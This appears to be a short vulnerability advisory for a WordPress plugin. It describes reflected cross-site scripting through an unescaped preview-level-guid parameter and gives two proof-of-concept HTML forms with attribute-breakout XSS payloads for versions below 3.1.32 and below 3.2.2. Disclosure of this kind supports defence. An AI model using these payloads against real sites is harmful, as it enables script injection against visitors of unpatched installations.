The plugin does not sanitise and escape the preview-level-guid parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
v < 3.1.32
<form action="http://example.com/?customize_messenger_channel" method="POST">
<input type="text" name="preview-level-guid" value='" xxx><img src onerror=alert(/XSS/)>'>
<input type="submit" value="Exploit me pls" />
</form>
v < 3.2.2
<form action="http://example.com/?customize_messenger_channel" method="POST">
<input type="text" name="preview-level-guid" value='" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//'>
<input type="submit" value="Exploit me pls" />
</form>